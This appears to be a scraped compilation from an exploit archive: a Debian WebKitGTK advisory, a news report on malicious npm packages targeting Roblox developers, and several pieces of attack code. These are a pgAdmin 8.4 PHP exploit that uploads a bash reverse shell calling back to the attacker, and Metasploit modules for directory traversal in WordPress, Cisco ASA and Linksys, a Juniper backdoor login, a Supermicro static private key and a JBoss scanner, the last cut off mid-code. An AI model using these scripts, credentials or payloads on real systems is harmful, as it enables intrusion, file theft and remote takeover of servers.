Debian Linux Security Advisory 5762-1 - The WebKitGTK web engine suffers from multiple vulnerabilities. An anonymous researcher discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. More issues are listed in this advisory.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5762-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
August 30, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-4558 CVE-2024-40776 CVE-2024-40779 CVE-2024-40780  
                 CVE-2024-40782 CVE-2024-40785 CVE-2024-40789 CVE-2024-40794

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-4558

    An anonymous researcher discovered that processing maliciously  
    crafted web content may lead to an unexpected process crash.

CVE-2024-40776

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40779

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40780

    Huang Xilin dicovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40782

    Maksymilian Motyl discovered that processing maliciously crafted  
    web content may lead to an unexpected process crash.

CVE-2024-40785

    Johan Carlsson discovered that processing maliciously crafted web  
    content may lead to a cross site scripting attack.

CVE-2024-40789

    Seunghyun Lee discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40794

    Matthew Butler discovered that private Browsing tabs may be  
    accessed without authentication.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.3-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmbR5W8ACgkQAAyEYu0C  
2ALznQ//bOsY+Xe6T18/q0zsHnyvCV/jxwfjrCUF+OVlulP5LJlrD6uQBdqMr5Jk  
9cRcS+qxc/lnqOGU12+MSc2tfvn9XSl5dqZFTHxCH4ztWDjNBzxKrHk82RIkAQ9p  
UVzrslRIVrZKlqbeBOCIlJSzc6GEJi5Msxy/4lnSbQ380WGfWQ26mplmgnLQgOL1  
OIInHO8VAonPU2I4v4G+BZA1lEKOsoJqXxdg8hsgyBiP4CDcxrpeN6SrPMARUObX  
CAsj+jsm4v8Bj7Wd8KvV4W3H137YmyrjPghWQwgmvyf+rvR1JjDwcXBTuAPv4HTC  
FQAFbVLoeQSLSpMO3b2oQ0s9f8o93/gbc4n7WyTYac/6IzxT/oH9uKwQABzWBg6C  
qcUBgJ1Z7rx9/PgQjWeT7uZdJkT7o7Eux2wtzud82jTM5goOCCqpZo93D35txiIu  
sRMoCaszdH65TJxLjPrJFargLw7x2kN0RJUAK167tnEsX56TWIGF+K7BQAr1YpS1  
mf3+2VC632yp5MXoejBsGDE4bH1OlgKF8xEs13V2LTb3w1ursC046LcOHLURIwX1  
+Cw49Pe6A0nhyv5raUaBzGvV9DbptTM+in8nCI4YXKlcQA87MjOORdVUnW1HWzZe  
PiRFGBay5dgSJW9ebTwVJQxNd2QKWZrLRDOLDhJuucxIZf+Fsb8=  
=SAKx  
-----END PGP SIGNATURE-----

Debian Security Advisory 5762-1

pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.

    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

pgAdmin 8.4 Code Execution 

Roblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware.
"By mimicking the popular 'noblox.js' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems," Checkmarx

Software Security / Malware

Roblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware.

"By mimicking the popular 'noblox.js' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems," Checkmarx researcher Yehuda Gelb said in a technical report.

Details about the campaign were first documented by ReversingLabs in August 2023 as part of a campaign that delivered a stealer called Luna Token Grabber, which it said was a "replay of an attack uncovered two years ago" in October 2021.

Since the start of the year, two other packages called noblox.js-proxy-server and noblox-ts were identified as malicious and impersonating the popular Node.js library to deliver stealer malware and a remote access trojan named Quasar RAT.

"The attackers of this campaign have employed techniques including brandjacking, combosquatting, and starjacking to create a convincing illusion of legitimacy for their malicious packages," Gelb said,

To that end, the packages are given a veneer of legitimacy by naming them noblox.js-async, noblox.js-thread, noblox.js-threads, and noblox.js-api, giving the impression to unsuspecting developers that these libraries are related to the legitimate "noblox.js" package.

The package download stats are listed below -

*   noblox.js-async (74 downloads)
*   noblox.js-thread (117 downloads)
*   noblox.js-threads (64 downloads)
*   noblox.js-api (64 downloads)

Another technique employed is starjacking, in which the phony packages list the source repository as that of the actual noblox.js library to make it seem more reputable.

The malicious code embedded in the latest iteration acts as a gateway for serving additional payloads hosted on a GitHub repository, while simultaneously stealing Discord tokens, updating the Microsoft Defender Antivirus exclusion list to evade detection, and setting up persistence by means of a Windows Registry change.

"Central to the malware's effectiveness is its approach to persistence, leveraging the Windows Settings app to ensure sustained access," Gelb noted. "As a result, whenever a user attempts to open the Windows Settings app, the system inadvertently executes the malware instead."

The end goal of the attack chain is the deployment of Quasar RAT granting the attacker remote control over the infected system. The harvested information is exfiltrated to the attacker's command-and-control (C2) server using a Discord webhook.

The findings are an indication a steady stream of new packages continue to be published despite takedown efforts, making it essential that developers stay vigilant against the ongoing threat.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious npm Packages Mimicking 'noblox.js' Compromise Roblox Developers’ Systems

This Metasploit module scans for the Juniper SSH backdoor (also valid on Telnet). Any username is required, and the password is <<< %s(un=%s) = %u.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  def initialize(info = {})    super(update_info(info,      'Name'           => 'Juniper SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Juniper SSH backdoor (also valid on Telnet).        Any username is required, and the password is <<< %s(un='%s') = %u.      },      'Author'         => [        'hdm',                               # Discovery        'h00die <mike[at]stcyrsecurity.com>' # Module      ],      'References'     => [        ['CVE', '2015-7755'],        ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],        ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']      ],      'DisclosureDate' => '2015-12-20',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    ssh_opts = ssh_client_defaults.merge({      :port            => rport,      :auth_methods    => ['password', 'keyboard-interactive'],      :password        => %q{<<< %s(un='%s') = %u},    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(          ip,          'admin',          ssh_opts        )      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    if ssh      print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")      report_vuln(        :host => ip,        :name => self.name,        :refs => self.references,        :info => ssh.transport.server_version.version      )    end  end  def rport    datastore['RPORT']  endend

Juniper SSH Backdoor Scanner

This Metasploit module exploits an authenticated directory traversal vulnerability in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing to read arbitrary directories with the web server privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'json'require 'nokogiri'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'WordPress NextGEN Gallery Directory Read Vulnerability',      'Description'    => %q{        This module exploits an authenticated directory traversal vulnerability        in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing        to read arbitrary directories with the web server privileges.      },      'References'     =>        [          ['WPVDB', '8165'],          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']        ],      'Author'         =>        [          'Sathish Kumar', # Vulnerability Discovery          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module        ],      'License'        => MSF_LICENSE    ))    register_options(      [        OptString.new('WP_USER', [true, 'A valid username', nil]),        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])      ])  end  def user    datastore['WP_USER']  end  def password    datastore['WP_PASS']  end  def check    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')  end  def get_nonce(cookie)    res = send_request_cgi(      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),      'method' => 'GET',      'vars_get'  => {        'page'    => 'ngg_addgallery'      },      'cookie' => cookie    )    if res && res.redirect? && res.redirection      location = res.redirection      print_status("Following redirect to #{location}")      res = send_request_cgi(        'uri'    => location,        'method' => 'GET',        'cookie' => cookie      )    end    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first  end  def parse_paths(res)    begin      j = JSON.parse(res.body)    rescue JSON::ParserError => e      elog(e)      return []    end    html = j['html']    noko = Nokogiri::HTML(html)    links = noko.search('a')    links.collect { |e| normalize_uri("#{datastore['DIRPATH']}/#{e.text}") }  end  def run_host(ip)    vprint_status("Trying to login as: #{user}")    cookie = wordpress_login(user, password)    if cookie.nil?      print_error("Unable to login as: #{user}")      return    end    store_valid_credential(user: user, private: password, proof: cookie)    vprint_status("Trying to get nonce...")    nonce = get_nonce(cookie)    if nonce.nil?      print_error("Can not get nonce after login")      return    end    vprint_status("Got nonce: #{nonce}")    traversal = "../" * datastore['DEPTH']    filename = datastore['DIRPATH']    filename = filename[1, filename.length] if filename =~ /^\//    res = send_request_cgi(      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path),      'headers'   => {        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_get'  => {        'photocrati_ajax' => '1'      },      'vars_post' => {        'nextgen_upload_image_sec' => "#{nonce}",        'action' => 'browse_folder',        'dir' => "#{traversal}#{filename}"      },      'cookie'    => cookie    )    if res && res.code == 200      paths = parse_paths(res)      vprint_line(paths * "\n")      fname = datastore['DIRPATH']      path = store_loot(        'nextgen.traversal',        'text/plain',        ip,        paths * "\n",        fname      )      print_good("File saved in: #{path}")    else      print_error("Nothing was downloaded. You can try to change the DIRPATH.")    end  endend

WordPress NextGEN Gallery Directory Read

This Metasploit module exploits a directory traversal vulnerability in Ciscos Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Ciscos VPN web service which includes directories, files, and currently logged in users.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Cisco ASA Directory Traversal',      'Description'    => %q{        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.        It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.      },      'Author'         => [ 'Michał Bentkowski',  # Discovery                            'Yassine Aboukir',    # PoC                            'Shelby Pace'         # Metasploit Module                          ],      'License'        => MSF_LICENSE,      'References'     => [                           [ 'CVE', '2018-0296' ],                           [ 'EDB', '44956' ]                          ],      'DisclosureDate' => '2018-06-06'    ))    register_options(      [        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),        OptBool.new('SSL', [ true, 'Use SSL', true ]),        Opt::RPORT(443)      ])  end  def is_accessible?    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')    res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))  end  def list_files(path)    uri = normalize_uri(target_uri.path, path)    list_res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    if list_res && list_res.code == 200      if list_res.body.match(/\/{3}sessions/)        get_sessions(list_res.body)      else        print_good(list_res.body)      end    end  end  def get_sessions(response)    session_nos = response.scan(/([0-9]{2,})/)    if session_nos.empty?      print_status("Could not detect any sessions")      print("\n")      return    end    print_good(response)    list_users(session_nos)  end  def list_users(sessions)    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    user_ids = Array.new    sessions.each do |session_no|      users_res = send_request_cgi(        'method'  =>  'GET',        'uri'     =>  normalize_uri(target_uri.path, sessions_uri, session_no)      )      if users_res && users_res.body.include?('name')        user_ids.push(users_res.body.match(/user:(\w+)/).to_s)      end    end    unless user_ids.empty?      print_status('Users logged in:')      user_ids.each { |id| print_good(id) }      print("\n")      return    end    print_status("There are no users logged in currently")  end  def run    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'    paths = [file_uri, sessions_uri, cscoe_uri]    unless is_accessible?      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')    end    paths.each { |path| list_files(path) }  endend

Cisco ASA Directory Traversal

This Metasploit module checks for a static SSL certificate shipped with Supermicro Onboard IPMI controllers. An attacker with access to the publicly-available firmware can perform man-in-the-middle attacks and offline decryption of communication to the controller. This Metasploit module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware version SMT_X9_214.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  PRIVATE_KEY = <<-EOF.gsub(/^ {4}/, '')    -----BEGIN RSA PRIVATE KEY-----    MIICXQIBAAKBgQC1q1kR6chWLfwspD84Asyy6EFV6SYRGy/gILsYGtn9kCQi2RFo    bNxS5CvphbGWn9D9n5gJpTVWLWb3LwJxGuBKSRj2wrHLlejzw6kSmF+3xFCuMfxV    FSj8TM8JqlOqM1c6lvH2MSXnN7pJBVcekNKbBUEfptakPSejStljbXecSwIDAQAB    AoGAah4/FzGiboTKCyGeNA+eltsIXzCjpdZlrtwvrbLxpyXtldWKT59XS6ww4mXQ    CJYuNBhnbSrt7vrybG0vVfZHEOCvK+5YKBOtvRgrWDgs1Bkc5hsdI5gLx3jE7g6M    PuUvD7ueF4OzYeYRrOLWr957jl32n+hD/k65bKWAUp3aTDECQQDqnEPZWlmoH7Jp    6woRnEp+1cullHv8DviM5Huh+JeBotSa03p4unhKlRYSqnHdeHU2343n1VUDzvnV    LQWi5G+FAkEAxjt0S67lyuuVD842uZRHt2WSQvwt23aKzQ+EJwV0IXYzfefeLzEm    dDdvc1AJ31gweAQK89/5/1EEF40K7BJdjwJBAJDFdtTT/QlS7eyQPjlZwVp9IVp+    wvdqYZPHlkb/uLYlPZ6Aq01+e6ZCU0mXZgYtQ99lmhKaQQjFmsMiMh0va2UCQA2T    NLuaFpJ235ZdgNHknaSpiAKeUmWdEJRKY7poXTONbKlKn6SLsR50TWWQLZzl5SvS    2w0oYW5ile0m84CHIXECQQCrABn0HY4Ll9/4FX+OCWamqwENltU1GcGIogeyFymK    ZVX8QdAVoUiZoUaVku946j63WNSkI1sU/UWhL6XDt4gx    -----END RSA PRIVATE KEY-----  EOF  def initialize    super(      'Name'        => 'Supermicro Onboard IPMI Static SSL Certificate Scanner',      'Description' => %q{        This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI        controllers. An attacker with access to the publicly-available firmware can perform        man-in-the-middle attacks and offline decryption of communication to the controller.        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware        version SMT_X9_214.      },      'Author'       =>        [          'hdm', # Discovery and analysis          'juan' # Metasploit module        ],      'License'     => MSF_LICENSE,      'References'  =>        [          [ 'CVE', '2013-3619' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/']        ],      'DisclosureDate' => 'Nov 06 2013'    )    register_options(      [        Opt::RPORT(443),      ])  end  # Fingerprint a single host  def run_host(ip)    connect(true, {"SSL" => true}) #Force SSL    cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)    disconnect    unless cert      vprint_error("#{ip}:#{rport} - No certificate found")      return    end    pkey = OpenSSL::PKey::RSA.new(PRIVATE_KEY)    result = cert.verify(pkey)    if result      print_good("#{ip}:#{rport} - Vulnerable to CVE-2013-3619 (Static SSL Certificate)")      # Report with the SSL Private Key hash for the host      digest = OpenSSL::Digest::SHA1.new(pkey.public_key.to_der).to_s.scan(/../).join(":")      report_note(        :host  => ip,        :proto => 'tcp',        :port  => rport,        :type  => 'supermicro.ipmi.ssl.certificate.pkey_hash',        :data  => digest      )      report_vuln({        :host  => rhost,        :port  => rport,        :proto => 'tcp',        :name  => "Supermicro Onboard IPMI Static SSL Certificate",        :refs  => self.references      })    end  endend

Supermicro Onboard IPMI Static SSL Certificate Scanner

This Metasploit module exploits a directory traversal vulnerability which is present in different Linksys home routers, like the E1500.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Linksys E1500 Directory Traversal Vulnerability',      'Description' => %q{          This module exploits a directory traversal vulnerability which is present in        different Linksys home routers, like the E1500.      },      'References'  =>        [          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],          [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ],          [ 'BID', '57760' ],          [ 'OSVDB', '89911' ],          [ 'EDB', '24475' ]        ],      'Author'      => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],      'License'     => MSF_LICENSE    )    register_options(      [        OptPath.new('SENSITIVE_FILES',  [ true, "File containing sensitive files, one per line",          File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),        OptString.new('HttpUsername',[ true, 'User to login with', 'admin']),        OptString.new('HttpPassword',[ true, 'Password to login with', 'password']),      ])  end  def extract_words(wordfile)    return [] unless wordfile && File.readable?(wordfile)    begin      File.readlines(wordfile, chomp: true)    rescue ::StandardError => e      elog(e)      []    end  end  def find_files(file,user,pass)    uri = "/apply.cgi"    traversal = '../..'    data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file    res = send_request_cgi({      'method'  => 'POST',      'uri'     => uri,      'authorization' => basic_auth(user,pass),      'vars_post' => {        "submit_type" => "wsc_method2",        "change_action" => "gozila_cgi",        "next_page" => traversal << file      }    })    # without res.body.length we get lots of false positives    if (res and res.code == 200 and res.body.length > 0)      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")      report_web_vuln({          :host => rhost,          :port => rport,          :vhost => datastore['VHOST'],          :path => uri,          :pname => data_trav,          :risk => 3,          :proof => data_trav,          :name => self.fullname,          :category => "web",          :method => "POST"      })      loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file)      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")    elsif (res and res.code)      vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")    end  end  def run_host(ip)    user = datastore['HttpUsername']    pass = datastore['HttpPassword']    vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")    # test login    begin      res = send_request_cgi({        'uri' => '/',        'method' => 'GET',        'authorization' => basic_auth(user,pass)      })      return if res.nil?      return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/)      return if (res.code == 404)      if [200, 301, 302].include?(res.code)        vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")      else        vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")        return      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    extract_words(datastore['SENSITIVE_FILES']).each do |file|      find_files(file, user, pass) unless file.empty?    end  endend

Linksys E1500 Directory Traversal

This Metasploit module scans a JBoss instance for a few vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'                  => 'JBoss Vulnerability Scanner',      'Description'           => %q(        This module scans a JBoss instance for a few vulnerabilities.      ),      'Author'                =>        [          'Tyler Krpata',          'Zach Grace <@ztgrace>'        ],      'References'            =>        [          [ 'CVE', '2008-3273' ], # info disclosure via unauthenticated access to "/status"          [ 'CVE', '2010-1429' ], # info disclosure via unauthenticated access to "/status" (regression)          [ 'CVE', '2010-0738' ], # VERB auth bypass on "JMX-Console": /jmx-console/          [ 'CVE', '2010-1428' ], # VERB auth bypass on "Web Console": /web-console/          [ 'CVE', '2017-12149' ] # deserialization: "/invoker/readonly"        ],      'License'               => BSD_LICENSE      ))    register_options(      [        OptString.new('VERB',  [ true,  "Verb for auth bypass testing", "HEAD"])      ])  end  def run_host(ip)    res = send_request_cgi(      {        'uri'       => "/" + Rex::Text.rand_text_alpha(12),        'method'    => 'GET',        'ctype'     => 'text/plain'      })    if res      info = http_fingerprint(:response => res)      print_status("#{rhost}:#{rport} Fingerprint: #{info}")      if res.body && />(JBoss[^<]+)/.match(res.body)        print_error("#{rhost}:#{rport} JBoss error message: #{$1}")      end      apps = [        '/jmx-console/HtmlAdaptor',        '/jmx-console/checkJNDI.jsp',        '/status',        '/web-console/ServerInfo.jsp',        # apps added per Patrick Hof        '/web-console/Invoker',        '/invoker/JMXInvokerServlet',        '/invoker/readonly'      ]      print_status("#{rhost}:#{rport} Checking http...")      apps.each do |app|        check_app(app)      end      jboss_as_default_creds      ports = {        # 1098i, 1099, and 4444 needed to use twiddle        1098 => 'Naming Service',        1099 => 'Naming Service',        4444 => 'RMI invoker'      }      print_status("#{rhost}:#{rport} Checking services...")      ports.each do |port, service|        status = test_connection(ip, port) == :up ? "open" : "closed"        print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")      end    end  end  def check_app(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain'    })    unless res      print_status("#{rhost}:#{rport} #{app} not found")      return    end    case    when res.code == 200      print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")    when res.code == 403      print_status("#{rhost}:#{rport} #{app} restricted (403)")    when res.code == 401      print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")      